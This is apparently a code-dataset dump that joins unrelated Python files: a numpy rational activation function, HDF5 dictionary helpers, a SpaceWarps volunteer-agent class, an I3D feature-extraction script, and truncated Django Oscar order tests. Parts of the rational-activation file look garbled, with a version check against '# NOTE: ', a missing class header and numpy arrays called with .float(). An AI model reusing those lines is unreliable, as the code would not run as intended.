] | null | null | null | rational/numpy/rationals.py | ThomasRot/rational_activations | 1fa26d1ee5f3c916eda00c899afa96eccb960143 | [
"MIT"
] | null | null | null | import numpy as np
import numpy as NP
import numpy as np  # the code below consistently uses the lowercase alias
"""
Rational activation function based on numpy
Arguments:
approx_func (str):
The name of the approximated function for initialisation. \
The different initialable functions are available in \
`rational.rationals_config.json`. \n
Default ``leaky_relu``.
degrees (tuple of int):
The degrees of the numerator (P) and denominator (Q).\n
Default ``(5, 4)``
version (str):
Version of Rational to use. Rational(x) = P(x)/Q(x)\n
`A`: Q(x) = 1 + \|b_1.x\| + \|b_2.x\| + ... + \|b_n.x\|\n
`B`: Q(x) = 1 + \|b_1.x + b_2.x + ... + b_n.x\|\n
`C`: Q(x) = 0.1 + \|b_1.x + b_2.x + ... + b_n.x\|\n
`D`: like `B` with noise\n
Default ``A``
Returns:
Module: Rational module
"""
def __init__(self, approx_func="leaky_relu", degrees=(5, 4), version="A"):
from rational.utils.get_weights import get_parameters
w_numerator, w_denominator = get_parameters(version, degrees,
approx_func)
self.numerator = w_numerator
self.denominator = w_denominator
self.init_approximation = approx_func
self.degrees = degrees
self.version = version
if version == "A":
rational_func = Rational_version_A
elif version == "B":
rational_func = Rational_version_B
elif version == "C":
rational_func = Rational_version_C
elif version == "# NOTE: ":
rational_func = Rational_version_N
else:
raise ValueError("version %s not implemented" % version)
self.activation_function = rational_func
def __call__(self, x):
if type(x) is int:
x = float(x)
return self.activation_function(x, self.numerator, self.denominator)
def torch(self, cuda=None, trainable=True, train_numerator=True,
train_denominator=True):
"""
Returns a torch version of this activation function.
Arguments:
cuda (bool):
Use GPU CUDA version. If None, use cuda if available on \
the machine\n
Default ``None``
trainable (bool):
If the weights are trainable, i.e, if they are updated \
during backward pass\n
Default ``True``
Returns:
function: Rational torch function
"""
from rational.torch import Rational as Rational_torch
import torch.nn as nn
import torch
rtorch = Rational_torch(self.init_approximation, self.degrees,
cuda, self.version, trainable,
train_numerator, train_denominator)
rtorch.numerator = nn.Parameter(torch.FloatTensor(self.numerator)
.to(rtorch.device),
requires_grad=trainable and train_numerator)
rtorch.denominator = nn.Parameter(torch.FloatTensor(self.denominator)
.to(rtorch.device),
requires_grad=trainable and train_denominator)
return rtorch
def fit(self, function, x_range=np.arange(-3., 3., 0.1)):
"""
Compute the parameters a, b, c, and d to have the neurally equivalent \
function of the provided one as close as possible to this rational \
function.
Arguments:
function (callable):
The function you want to fit to rational.
x (array):
The range on which the curves of the functions are fitted \
together. \n
Default ``True``
show (bool):
If ``True``, plots the final fitted function and \
rational (using matplotlib) \n
Default ``False``
Returns:
tuple: ((a, b, c, d), dist) with: \n
a, b, c, d: the parameters to adjust the function \
(vertical and horizontal scales and bias) \n
dist: The final distance between the rational function and the \
fitted one.
"""
from rational.utils import find_closest_equivalent
(a, b, c, d), distance = find_closest_equivalent(self, function,
x_range)
return (a, b, c, d), distance
def __repr__(self):
return (f"Rational Activation Function (Numpy version "
f"{self.version}) of degrees {self.degrees}")
def numpy(self):
return self
def show(self, input_range=None, display=True, distribution=None):
"""
Show the function using `matplotlib`.
Arguments:
input_range (range):
The range to print the function on.\n
Default ``None``
display (bool):
If ``True``, displays the graph.
Otherwise, returns it. \n
Default ``True``
"""
import matplotlib.pyplot as plt
try:
import seaborn as sns
sns.set_style("whitegrid")
except ImportError as e:
print("seaborn not found on computer, install it for better",
"visualisation")
ax = plt.gca()
if input_range is None:
if distribution is None:
distribution = self.distribution
if distribution is None:
input_range = np.arange(-3, 3, 0.01)
else:
freq, bins = _cleared_arrays(distribution)
if freq is None:
input_range = np.arange(-3, 3, 0.01)
else:
ax2 = ax.twinx()
ax2.set_yticks([])
grey_color = (0.5, 0.5, 0.5, 0.6)
ax2.bar(bins, freq, width=bins[1] - bins[0],
color=grey_color, edgecolor=grey_color)
input_range = np.array(bins).float()
else:
input_range = np.array(input_range).float()
outputs = self.activation_function(input_range, self.numerator,
self.denominator, False)
outputs_np = outputs.detach().cpu().numpy()
ax.plot(input_range.detach().cpu().numpy(),
outputs_np)
if display:
plt.show()
else:
return plt.gcf()
def Rational_version_A(x, w_array, d_array):
    """Safe rational P(x)/Q(x) with Q(x) = 1 + |b_1 x| + ... + |b_n x^n|."""
    # Numerator: a_0 + a_1 x + ... + a_m x^m, accumulated elementwise.
    power = np.ones_like(x)
    numerator = np.ones_like(x) * w_array[0]
    for coeff in w_array[1:]:
        power *= x
        numerator += coeff * power
    # Denominator: each term enters through an absolute value, so Q >= 1.
    power = np.ones_like(x)
    denominator = np.ones_like(x)
    for coeff in d_array:
        power *= x
        denominator += np.abs(coeff * power)
    return numerator / denominator
def Rational_version_B(x, w_array, d_array):
    """Safe rational P(x)/Q(x) with Q(x) = 1 + |b_1 x + ... + b_n x^n|."""
    # Numerator polynomial, accumulated elementwise.
    power = np.ones_like(x)
    numerator = np.ones_like(x) * w_array[0]
    for coeff in w_array[1:]:
        power *= x
        numerator += coeff * power
    # Denominator polynomial (without constant term), then norm: |.| + 1.
    power = np.ones_like(x)
    denominator = np.zeros_like(x)
    for coeff in d_array:
        power *= x
        denominator += coeff * power
    denominator = np.abs(denominator) + np.ones_like(denominator)
    return numerator / denominator
def Rational_version_C(x, w_array, d_array):
    """Safe rational P(x)/Q(x) with Q(x) = 0.1 + |b_0 + b_1 x + ... |."""
    # Numerator polynomial, accumulated elementwise.
    power = np.ones_like(x)
    numerator = np.ones_like(x) * w_array[0]
    for coeff in w_array[1:]:
        power *= x
        numerator += coeff * power
    # Denominator polynomial: unlike versions A/B, the degree starts at 0,
    # so b_0 contributes a constant term.
    power = np.ones_like(x)
    denominator = np.zeros_like(x)
    for coeff in d_array:
        denominator += coeff * power
        power *= x
    denominator = np.abs(denominator) + np.full_like(denominator, 0.1)
    return numerator / denominator
def Rational_version_N(x, w_array, d_array):
    """
    Non safe version, original rational without norm

    Q(x) = 1 + b_1 x + ... + b_n x^n may cross zero, so poles are possible.
    """
    # Numerator polynomial, accumulated elementwise.
    power = np.ones_like(x)
    numerator = np.ones_like(x) * w_array[0]
    for coeff in w_array[1:]:
        power *= x
        numerator += coeff * power
    # Denominator polynomial plus 1 -- no absolute value applied.
    power = np.ones_like(x)
    denominator = np.zeros_like(x)
    for coeff in d_array:
        power *= x
        denominator += coeff * power
    denominator = denominator + np.ones_like(denominator)
    return numerator / denominator
#if __name__ == '__main__':
# def crazy_func(x):
# outp = (100 - 50*x - 100*x**2)/(1 - 10*x - 10*x**2)
# disc = outp[:-1] * outp[1:] < -5
# idx = [-1] + [i for i, x in enumerate(disc) if x] + [len(outp)]
# return ([x[s+1:e+1] for s, e in zip(idx[:-1], idx[1:])], \
# [outp[s+1:e+1] for s, e in zip(idx[:-1], idx[1:])])
# import matplotlib.pyplot as plt
# inp = np.arange(-3, 3, 0.01)
# ax = plt.gca()
# arrs = crazy_func(inp)
# for i in range(len(arrs[0])):
# ax.plot(arrs[0][i], arrs[1][i], 'r')
# plt.show()
| 35.963855 | 88 | 0.512228 |
ace94e8c3f2fb083751c0f370605f533a7b7761e | 15,335 | py | Python | astroutils/nonmathops.py | nithyanandan/AstroUtils | 97473f52d4247bb9c8507598899215d0662e8d6f | [
"MIT"
] | 1 | 2018-10-31T03:49:39.000Z | 2018-10-31T03:49:39.000Z | astroutils/nonmathops.py | nithyanandan/AstroUtils | 97473f52d4247bb9c8507598899215d0662e8d6f | [
"MIT"
] | 5 | 2017-11-18T01:45:50.000Z | 2020-05-30T12:26:50.000Z | astroutils/nonmathops.py | nithyanandan/AstroUtils | 97473f52d4247bb9c8507598899215d0662e8d6f | [
"MIT"
] | 1 | 2019-10-14T08:44:40.000Z | 2019-10-14T08:44:40.000Z | import numpy as NP
import h5py
import ast
import warnings
def recursive_find_notNone_in_dict(inpdict):
"""
----------------------------------------------------------------------------
Recursively walk through a dictionary and reduce it to only non-None values.
Inputs:
inpdict [dictionary] Input dictionary to reduced to non-None values
Outputs:
outdict is an output dictionary which only contains keys and values
corresponding to non-None values
----------------------------------------------------------------------------
"""
if not isinstance(inpdict, dict):
raise TypeError('inpdict must be a dictionary')
outdict = {}
for k, v in inpdict.iteritems():
if v is not None:
if not isinstance(v, dict):
outdict[k] = v
else:
temp = recursive_find_notNone_in_dict(v)
if temp:
outdict[k] = temp
return outdict
################################################################################
def is_dict1_subset_of_dict2(dict1, dict2, ignoreNone=True):
"""
----------------------------------------------------------------------------
Check if keys and values of the first dictionary are a subset of the second.
Inputs:
dict1 [dictionary] First dictionary. It will be checked if both its
keys and values are a subset of the second dictionary.
dict2 [dictionary] Second dictionary. The values and keys of the first
dictionary will be checked against this dictionary to check if
the first is a subset of the second.
ignoreNone [boolean] If set to True (default), the subset checking happens
using the non-None values in both dictionaries. This is a
loose check. If set to False, a strict subset checking happens
not ignoring the None values, if any.
Output:
Boolean value True if dict1 is found to be a subset of dict2, False
otherwise
----------------------------------------------------------------------------
"""
if not isinstance(dict1, dict):
raise TypeError('Input dict1 must be a dictionary')
if not isinstance(dict2, dict):
raise TypeError('Input dict2 must be a dictionary')
if ignoreNone:
dict1 = recursive_find_notNone_in_dict(dict1)
dict2 = recursive_find_notNone_in_dict(dict2)
if cmp(dict1, dict2) == 0:
return True
else:
dict2sub = {}
for k, v in dict1.iteritems():
if k in dict2:
dict2sub[k] = dict2[k]
else:
return False
if cmp(dict1, dict2sub) == 0:
return True
else:
return False
################################################################################
def find_list_in_list(reference_array, inp):
"""
---------------------------------------------------------------------------
Find occurrences of input list in a reference list and return indices
into the reference list
Inputs:
reference_array [list or numpy array] One-dimensional reference list or
numpy array in which occurrences of elements in the input
list or array will be found
inp [list or numpy array] One-dimensional input list whose
elements will be searched in the reference array and
the indices into the reference array will be returned
Output:
ind [numpy masked array] Indices of occurrences of elements
of input array in the reference array. It will be of same
size as input array. For example,
inp = reference_array[ind]. Indices for elements which are
not found in the reference array will be masked.
---------------------------------------------------------------------------
"""
try:
reference_array, inp
except NameError:
raise NameError('Inputs reference_array, inp must be specified')
if not isinstance(reference_array, (list, NP.ndarray)):
raise TypeError('Input reference_array must be a list or numpy array')
reference_array = NP.asarray(reference_array).ravel()
if not isinstance(inp, (list, NP.ndarray)):
raise TypeError('Input inp must be a list or numpy array')
inp = NP.asarray(inp).ravel()
if (inp.size == 0) or (reference_array.size == 0):
raise ValueError('One or both inputs contain no elements')
sortind_ref = NP.argsort(reference_array)
sorted_ref = reference_array[sortind_ref]
ind_in_sorted_ref = NP.searchsorted(sorted_ref, inp)
ii = NP.take(sortind_ref, ind_in_sorted_ref, mode='clip')
mask = reference_array[ii] != inp
ind = NP.ma.array(ii, mask=mask)
return ind
################################################################################
def find_all_occurrences_list1_in_list2(list1, list2):
"""
---------------------------------------------------------------------------
Find all occurrences of input list1 (a reference list) in input list2
Inputs:
list1 [list or numpy array] List of elements which need to be searched
for in list2. Must be a flattened list or numpy array
list2 [list or numpy array] List of elements in which elements in list1
are searched for. Must be a flattened list or numpy array
Output:
ind [list of lists] Indices of occurrences of elements
of input list1 indexed into list2. For each element in list1,
there is an output list which contains all the indices of this
element occurring in list2. Hence, the output is a list of lists
where the top level list contains equal number of items as list1.
Each i-th item in this list is another list containing indices of
the element list1[i] in list2
---------------------------------------------------------------------------
"""
if not isinstance(list1, (list, NP.ndarray)):
raise TypeError('Input list1 must be a list or numpy array')
if not isinstance(list2, (list, NP.ndarray)):
raise TypeError('Input list2 must be a list or numpy array')
list_of_list_of_inds = [[i for i, x in enumerate(list2) if x == e] for e in list1]
return list_of_list_of_inds
################################################################################
def save_dict_to_hdf5(dic, filename, compressinfo=None):
"""
---------------------------------------------------------------------------
Save a dictionary as a HDF5 structure under the given filename preserving
its structure
Inputs:
dic [dictionary] Input dictionary which is to be stored in HDF5
format
filename [string] string containing full path to the HDF5 file including
the file name
compressinfo
[dictionary] Dictionary containing compression options or
set as None (default) when no compression is to be applied.
When compression is to be applied, it contains keys of those
data that are to be compressed. Under each key is another
dictionary with the following keys and values:
'compress_fmt' [string] Compression format. Accepted values
are 'gzip' and 'lzf'
'compress_opts' [int] Integer denoting level of compression.
Only applies if compress_fmt is set to 'gzip'.
It must be an integer between 0 and 9
'chunkshape' [tuple] Shape of the chunks to be used in
compression. It must be broadcastable to the
data shape inside input dic
If at any point, any error is encountered, it will switch to
no compression
---------------------------------------------------------------------------
"""
with h5py.File(filename, 'w') as h5file:
recursively_save_dict_contents_to_group(h5file, '/', dic, compressinfo=compressinfo)
################################################################################
def recursively_save_dict_contents_to_group(h5file, path, dic, compressinfo=None):
"""
---------------------------------------------------------------------------
Recursively store contents of a dictionary in HDF5 groups
Inputs:
h5file [Python File Object] An open file object under which the HDF5
groups will be created
path [string] String containing the root group under the python file
object h5file
dic [dictionary] dictionary whose keys and items will be stored
under the root group specified by path under the python file
object h5file
compressinfo
[dictionary] Dictionary containing compression options or
set as None (default) when no compression is to be applied.
When compression is to be applied, it contains keys of those
data that are to be compressed. Under each key is another
dictionary with the following keys and values:
'compress_fmt' [string] Compression format. Accepted values
are 'gzip' and 'lzf'
'compress_opts' [int] Integer denoting level of compression.
Only applies if compress_fmt is set to 'gzip'.
It must be an integer between 0 and 9
'chunkshape' [tuple] Shape of the chunks to be used in
compression. It must be broadcastable to the
data shape inside input dic
If at any point, any error is encountered, it will switch to
no compression
---------------------------------------------------------------------------
"""
for key, item in dic.iteritems():
if not isinstance(key, str):
warnings.warn('Key found not to be a string. Converting the key to string and proceeding...')
key = str(key)
if isinstance(item, (NP.ndarray, NP.int, NP.int32, NP.int64, NP.float, NP.float32, NP.float64, NP.complex, NP.complex64, NP.complex128, str, bytes)):
if isinstance(item, NP.ndarray):
if compressinfo is not None:
if isinstance(compressinfo, dict):
try:
compress_fmt = compressinfo[key]['compress_fmt'].lower()
compress_opts = NP.clip(compressinfo[key]['compress_opts'], 0, 9)
chunkshape = compressinfo[key]['chunkshape']
except:
h5file[path + key] = item
else:
dset = h5file.create_dataset(path+key, data=item, chunks=chunkshape, compression=compress_fmt, compression_opts=compress_opts)
# if not isinstance(compressinfo[key]['compress_fmt'], str):
# raise TypeError('Input parameter compress_fmt must be a string')
# compress_fmt = compressinfo[key]['compress_fmt'].lower()
# if compress_fmt not in ['gzip', 'lzf']:
# raise ValueError('Input parameter compress_fmt invalid')
# if compress_fmt == 'gzip':
# if not isinstance(compressinfo[key]['compress_opts'], int):
# raise TypeError('Input parameter compress_opts must be an integer')
# compress_opts = NP.clip(compressinfo[key]['compress_opts'], 0, 9)
# if 'chunkshape' not in compressinfo[key]:
# raise KeyError('Key chunkshape not provided in cmagompressinfo parameter')
# elif not isinstance(compressinfo[key]['chunkshape'], tuple):
# raise TypeError('Value under chunkshape key in compressinfo parameter must be a tuple')
# else:
# dset = h5file.create_dataset(path+key, data=item, chunks=chunkshape, compression=compress_fmt, compression_opts=compress_opts)
else:
warnings.warn('Compression options not specified properly. Proceeding with no compression')
h5file[path + key] = item
else:
h5file[path + key] = item
else:
h5file[path + key] = item
elif item is None:
h5file[path + key] = 'None'
elif isinstance(item, dict):
recursively_save_dict_contents_to_group(h5file, path + key + '/', item, compressinfo=compressinfo)
else:
raise ValueError('Cannot save %s type'%type(item))
################################################################################
def load_dict_from_hdf5(filename):
"""
---------------------------------------------------------------------------
Load HDF5 contents into a python dictionary preserving the structure
Input:
filename [string] Full path to the HDF5 file
Output:
Python dictionary containing the contents of the HDF5 file
---------------------------------------------------------------------------
"""
with h5py.File(filename, 'r') as h5file:
return recursively_load_dict_contents_from_group(h5file, '/')
################################################################################
def recursively_load_dict_contents_from_group(h5file, path):
"""
---------------------------------------------------------------------------
Recursively load HDF5 group contents into python dictionary structure
Inputs:
h5file [Python File Object] An open file object under which the HDF5
groups will be created
path [string] String containing the root group under the python file
object h5file
Output:
Python structure that is copied from the HDF5 content at the level
specified by the path in the python object h5file
---------------------------------------------------------------------------
"""
ans = {}
for key, item in h5file[path].items():
if isinstance(item, h5py._hl.dataset.Dataset):
if isinstance(item.value, str):
try:
if ast.literal_eval(item.value) is None:
ans[key] = None
except:
ans[key] = item.value
else:
ans[key] = item.value
elif isinstance(item, h5py._hl.group.Group):
ans[key] = recursively_load_dict_contents_from_group(h5file, path + key + '/')
return ans
################################################################################
| 42.129121 | 157 | 0.521356 |
ace94ec93b942ed24c5fc6e22663ca3b522370cd | 12,205 | py | Python | analysis/swap/agent.py | cpadavis/SpaceWarps | e25056b4b3f2df1c7348f18bc8e4995d91d2ac04 | [
"MIT"
] | null | null | null | analysis/swap/agent.py | cpadavis/SpaceWarps | e25056b4b3f2df1c7348f18bc8e4995d91d2ac04 | [
"MIT"
] | null | null | null | analysis/swap/agent.py | cpadavis/SpaceWarps | e25056b4b3f2df1c7348f18bc8e4995d91d2ac04 | [
"MIT"
] | null | null | null | # ======================================================================
import swap
import numpy as np
import pylab as plt
actually_it_was_dictionary = {'LENS': 1, 'NOT': 0, 'UNKNOWN': -1}
# ======================================================================
class Agent(object):
"""
NAME
Agent
PURPOSE
A little robot who will interpret the classifications of an
individual volunteer.
COMMENTS
An Agent is assigned to represent a volunteer, whose Name is
either a Zooniverse userid or, if that is not available, an IP
address. Agents each have a History of N classifications,
including ND that turned out to be duds and NL that turned out
to be lenses. NT is the total number of training subjects
classified, and is equal to N in the simple "LENS or NOT"
analysis. Each Agent carries a "confusion matrix"
parameterised by two numbers, PD and PL, the meaning of which is
as follows:
An Agent assumes that its volunteer says:
| "LENS" when it is NOT "LENS" when it is a LENS |
| with probability (1-PD) with probability PL |
| |
| "NOT" when it is NOT "NOT" when it is a LENS |
| with probability PD with probability (1-PL) |
It makes the simplest possible assignment for these probabilities,
namely that PX = 0.5 if NX = 0, and then updates from there using the
training subjects such that
PX = (NX_correct + initialNX/2) / (NX+initialNX)
at all times. For example, if the volunteer is right about 80% of the
simulated lenses they see, the agent will assign:
PL = Pr("LENS"|LENS) = 0.8.
initialNX are listed in the configuration file.
Agents are initialised with PL = PD = some initial value,
provided in the configuration file. (0.5,0.5) would be a
conservative choice - but it may well underestimate the
volunteers' natural lens-spotting talent. PL and PD are capped
because the agents assume that their volunteers are
only human. The upper limits are kept in swap.PDmax and
swap.PLmax.
The big assumption the Agent is making is that its
volunteer has a single, constant PL and a single, constant
PD, which it estimates using all the volunteer's data. This is
clearly sub-optimal, but might be good enough for a first
attempt. We'll see!
Agents now also have a kind attribute. Agents may be 'normal' users,
'super' users, or 'banned' users. Currently being a 'super' user does
nothing, but maybe in the future they will get harder images. 'banned'
agents are ones whose contributions are ignored. Agents do not have a
method for converting themselves to 'super' or 'banned' -- that is
something for SWAP, or a bureau to do.
INITIALISATION
name
METHODS
Agent.update_contribution() Calculate the expected
information contributed
per classification
Agent.heard(it_was=X,actually_it_was=Y) Read report.
Agent.plot_history(axes)
BUGS
AUTHORS
This file is part of the Space Warps project, and is distributed
under the MIT license by the Space Warps Science Team.
http://spacewarps.org/
HISTORY
2013-04-17: Started Marshall (Oxford)
2015-01-19: Added 'kind'. (CPD)
"""
# ----------------------------------------------------------------------
def __init__(self,name,pars):
self.name = name
self.kind = 'normal' # normal, super, banned
self.PD = pars['initialPD']
self.PL = pars['initialPL']
self.ND = 2 + pars['skepticism']
self.NL = 2 + pars['skepticism']
self.N = 0
self.NT = 0
# back-compatibility:
self.contribution = 0.0*self.update_skill() # This call also sets self.skill, internally
self.traininghistory = {'ID':np.array([]),
'Skill':np.array([self.skill]),
'PL':np.array([self.PL]),
'PD':np.array([self.PD]),
'ItWas':np.array([], dtype=int),
'ActuallyItWas':np.array([], dtype=int),
'At_Time': np.array([])}
self.testhistory = {'ID':[],
'I':np.array([]),
'Skill':np.array([]),
'ItWas':np.array([], dtype=int),
'At_Time': np.array([])}
return None
# ----------------------------------------------------------------------
def __str__(self):
return 'individual classification agent representing %s with contribution %.2f' % \
(self.name,self.contribution)
# ----------------------------------------------------------------------
# Compute expected information per classification:
def update_skill(self):
## plogp = np.zeros([2])
## plogp[0] = 0.5*(self.PD+self.PL)*np.log2(self.PD+self.PL)
## plogp[1] = 0.5*(1.0-self.PD+1.0-self.PL)*np.log2(1.0-self.PD+1.0-self.PL)
## self.contribution = np.sum(plogp)
self.skill = swap.expectedInformationGain(0.5, self.PL, self.PD)
return self.skill
# ----------------------------------------------------------------------
# Update confusion matrix with latest result:
# eg. collaboration.member[Name].heard(it_was='LENS',actually_it_was='NOT',with_probability=P,ignore=False)
def heard(self,it_was=None,actually_it_was=None,with_probability=1.0,ignore=False,ID=None,record=True,at_time=None):
if it_was==None or actually_it_was==None:
pass
else:
if actually_it_was=='LENS':
if not ignore:
self.PL = (self.PL*self.NL + (it_was==actually_it_was))/(1+self.NL)
self.PL = np.min([self.PL,swap.PLmax])
self.PL = np.max([self.PL,swap.PLmin])
# Always update experience, even if Agents are not willing to learn. PJM 8/7/14
self.NL += 1
self.NT += 1
elif actually_it_was=='NOT':
if not ignore:
self.PD = (self.PD*self.ND + (it_was==actually_it_was))/(1+self.ND)
self.PD = np.min([self.PD,swap.PDmax])
self.PD = np.max([self.PD,swap.PDmin])
self.ND += 1
self.NT += 1
# Unsupervised learning!
elif actually_it_was=='UNKNOWN':
increment = with_probability
if it_was=='LENS':
if not ignore:
self.PL = (self.PL*self.NL + increment)/(self.NL + increment)
self.PL = np.min([self.PL,swap.PLmax])
self.PL = np.max([self.PL,swap.PLmin])
self.NL += increment
if not ignore:
self.PD = (self.PD*self.ND + 0.0)/(self.ND + (1.0-increment))
self.PD = np.min([self.PD,swap.PDmax])
self.PD = np.max([self.PD,swap.PDmin])
self.ND += (1.0 - increment)
elif it_was=='NOT':
if not ignore:
self.PL = (self.PL*self.NL + 0.0)/(self.NL + increment)
self.PL = np.min([self.PL,swap.PLmax])
self.PL = np.max([self.PL,swap.PLmin])
self.NL += increment
if not ignore:
self.PD = (self.PD*self.ND + (1.0-increment))/(self.ND + (1.0-increment))
self.PD = np.min([self.PD,swap.PDmax])
self.PD = np.max([self.PD,swap.PDmin])
self.ND += (1.0 - increment)
# self.NT += 1 # Don't count test images as training images?!
# self.NT == 0 if unsupervised? Not sure. Maybe better to count every image
# as training when unsupervised... Bit odd though.
self.NT += 1
else:
raise Exception("Apparently, the subject was actually a "+str(actually_it_was))
if record:
# Always log on what are we trained, even if not learning:
self.traininghistory['ID'] = np.append(self.traininghistory['ID'],ID)
# Always log progress, even if not learning:
self.traininghistory['Skill'] = np.append(self.traininghistory['Skill'],self.update_skill())
# NB. self.skill is now up to date.
self.traininghistory['PL'] = np.append(self.traininghistory['PL'],self.PL)
self.traininghistory['PD'] = np.append(self.traininghistory['PD'],self.PD)
self.traininghistory['ItWas'] = np.append(self.traininghistory['ItWas'], actually_it_was_dictionary[it_was])
self.traininghistory['ActuallyItWas'] = np.append(self.traininghistory['ActuallyItWas'], actually_it_was_dictionary[actually_it_was])
self.traininghistory['At_Time'] = np.append(self.traininghistory['At_Time'], at_time)
return
# ----------------------------------------------------------------------
# Update confusion matrix with many results given at once (M step):
def heard_many_times(self, probabilities, classifications, laplace_smoothing=1.):
# unlike the equivalent function in subject, this one does not need to
# reference self.heard
# classifications are assumed to be 0 (NOT) or 1 (LENS)
probability_sum = np.sum(probabilities)
probability_num = len(probabilities)
classification_probability_sum = np.dot(classifications, probabilities)
classification_sum = np.sum(classifications)
self.PL = (laplace_smoothing + classification_probability_sum) / (2 * laplace_smoothing + probability_sum)
self.PD = (laplace_smoothing + probability_num - classification_sum - probability_sum + classification_probability_sum) / (2 * laplace_smoothing + probability_num - probability_sum)
return
# ----------------------------------------------------------------------
# Plot agent's history, as an overlay on an existing plot:
def plot_history(self,axes):
plt.sca(axes)
I = self.traininghistory['Skill']
N = np.linspace(1, len(I), len(I), endpoint=True)
# Information contributions:
plt.plot(N, I, color="green", alpha=0.2, linewidth=2.0, linestyle="-")
plt.scatter(N[-1], I[-1], color="green", alpha=0.5)
return
# ----------------------------------------------------------------------
# Get a realization for agent's PL distribution
def get_PL_realization(self,Ntrajectory):
NL_correct=self.PL*self.NL;
NL_correct_realize=np.random.binomial(self.NL,self.PL,size=Ntrajectory);
PL_realize=(NL_correct_realize*1.0)/(self.NL);
idx=np.where(PL_realize>swap.PLmax);
PL_realize[idx]=swap.PLmax;
idx=np.where(PL_realize<swap.PLmin);
PL_realize[idx]=swap.PLmin;
#print NL_correct,NL_correct_realize,PL_realize
return PL_realize;
# ----------------------------------------------------------------------
# Get a realization for agent's PD distribution
def get_PD_realization(self,Ntrajectory):
ND_correct=self.PD*self.ND;
ND_correct_realize=np.random.binomial(self.ND,self.PD,size=Ntrajectory);
PD_realize=(ND_correct_realize*1.0)/(self.ND);
idx=np.where(PD_realize>swap.PDmax);
PD_realize[idx]=swap.PDmax;
idx=np.where(PD_realize<swap.PDmin);
PD_realize[idx]=swap.PDmin;
#print ND_correct,ND_correct_realize,PD_realize
return PD_realize;
# ======================================================================
| 42.824561 | 189 | 0.541008 |
ace94ee293c0b9903f5e7a997330f0db1e0f14fa | 1,269 | py | Python | utils/feature_extraction/run_i3d_ECM_gpu.py | zsb87/SenGAN | d2b0f48c4452dcc864a290a2a90e354ae130abba | [
"MIT"
] | null | null | null | utils/feature_extraction/run_i3d_ECM_gpu.py | zsb87/SenGAN | d2b0f48c4452dcc864a290a2a90e354ae130abba | [
"MIT"
] | null | null | null | utils/feature_extraction/run_i3d_ECM_gpu.py | zsb87/SenGAN | d2b0f48c4452dcc864a290a2a90e354ae130abba | [
"MIT"
] | null | null | null | # import subprocess
from extract_features_gpu import run
from pathlib import Path
# def extract_frames(video,output):
# # command = "ffmpeg -i {video} -ac 1 -f flac -vn {output}".format(video=video, output=output)
# command = "ffmpeg -i {video} vid1/{output}/img_%05d.jpg".format(video=video, output=output)
# subprocess.call(command,shell=True)
if __name__ == '__main__':
    # Extract I3D optical-flow features for each of the five ECM recordings.
    for session in range(1, 6):
        # Frames live under '{input_folder}/{video_folder}/flow_x.jpg'.
        input_folder = "../../../dataset/ECM/ecm%d/" % session
        # Features are written as '{feature_dir}/{video_name}-{mode}.npz'.
        feature_dir = "../../../data/ECM/ecm%d_vid_feat/" % session
        Path(feature_dir).mkdir(parents=True, exist_ok=True)
        # Run the extractor over every video folder found in input_folder,
        # using the ImageNet-pretrained flow model.
        run(mode="flow",
            load_model="models/flow_imagenet.pt",
            sample_mode="resize",
            frequency=1,
            input_dir=input_folder,
            output_dir=feature_dir,
            batch_size=16,
            usezip=0)
| 39.65625 | 119 | 0.623325 |
ace94ef195df50919a069aba0207a104df846937 | 12,508 | py | Python | tests/integration/order/model_tests.py | Idematica/django-oscar | 242a0654210d63ba75f798788916c8b2f7abb7fb | [
"BSD-3-Clause"
] | null | null | null | tests/integration/order/model_tests.py | Idematica/django-oscar | 242a0654210d63ba75f798788916c8b2f7abb7fb | [
"BSD-3-Clause"
] | null | null | null | tests/integration/order/model_tests.py | Idematica/django-oscar | 242a0654210d63ba75f798788916c8b2f7abb7fb | [
"BSD-3-Clause"
] | null | null | null | from datetime import timedelta
from decimal import Decimal as D
from django.test import TestCase
from django.utils import timezone
import mock
from oscar.apps.address.models import Country
from oscar.apps.order.models import ShippingAddress, Order, Line, \
ShippingEvent, ShippingEventType, ShippingEventQuantity, OrderNote, \
OrderDiscount
from oscar.apps.order.exceptions import (InvalidOrderStatus, InvalidLineStatus,
InvalidShippingEvent)
from oscar.test.factories import create_order, create_offer, create_voucher, create_basket
from oscar.test.basket import add_product
# Canonical shipping-event-type code used when an order is first placed.
ORDER_PLACED = 'order_placed'
class ShippingAddressTest(TestCase):
    """Tests for the ShippingAddress model's derived salutation."""
    fixtures = ['countries.json']
    def test_titleless_salutation_is_stripped(self):
        # With no title supplied, the salutation should collapse to just the
        # last name with no stray whitespace.
        country = Country.objects.get(iso_3166_1_a2='GB')
        a = ShippingAddress.objects.create(
            last_name='Barrington', line1="75 Smith Road", postcode="N4 8TY", country=country)
        self.assertEquals("Barrington", a.salutation)
class OrderStatusPipelineTests(TestCase):
    """Tests for Order status transitions driven by the class-level pipeline.

    setUp/tearDown mutate the Order *class* attributes, so the pipeline is
    reset after each test to avoid leaking into other test cases.
    """
    def setUp(self):
        # Allowed transitions: PENDING -> SHIPPED/CANCELLED, SHIPPED -> COMPLETE.
        Order.pipeline = {'PENDING': ('SHIPPED', 'CANCELLED'),
                          'SHIPPED': ('COMPLETE',)}
        # Setting an order to SHIPPED cascades the same status to its lines.
        Order.cascade = {'SHIPPED': 'SHIPPED'}
    def tearDown(self):
        Order.pipeline = {}
        Order.cascade = {}
    def test_available_statuses_for_pending(self):
        self.order = create_order(status='PENDING')
        self.assertEqual(('SHIPPED', 'CANCELLED'),
                         self.order.available_statuses())
    def test_available_statuses_for_shipped_order(self):
        self.order = create_order(status='SHIPPED')
        self.assertEqual(('COMPLETE',), self.order.available_statuses())
    def test_no_statuses_available_for_no_status(self):
        # An order whose status is not in the pipeline has no onward moves.
        self.order = create_order()
        self.assertEqual((), self.order.available_statuses())
    def test_set_status_respects_pipeline(self):
        # SHIPPED -> PENDING is not a permitted transition.
        self.order = create_order(status='SHIPPED')
        with self.assertRaises(InvalidOrderStatus):
            self.order.set_status('PENDING')
    def test_set_status_does_nothing_for_same_status(self):
        self.order = create_order(status='PENDING')
        self.order.set_status('PENDING')
        self.assertEqual('PENDING', self.order.status)
    def test_set_status_works(self):
        self.order = create_order(status='PENDING')
        self.order.set_status('SHIPPED')
        self.assertEqual('SHIPPED', self.order.status)
    def test_cascading_status_change(self):
        # Per Order.cascade, shipping the order should ship every line too.
        self.order = create_order(status='PENDING')
        self.order.set_status('SHIPPED')
        for line in self.order.lines.all():
            self.assertEqual('SHIPPED', line.status)
class OrderNoteTests(TestCase):
    """Tests for OrderNote editability rules."""
    def setUp(self):
        self.order = create_order()
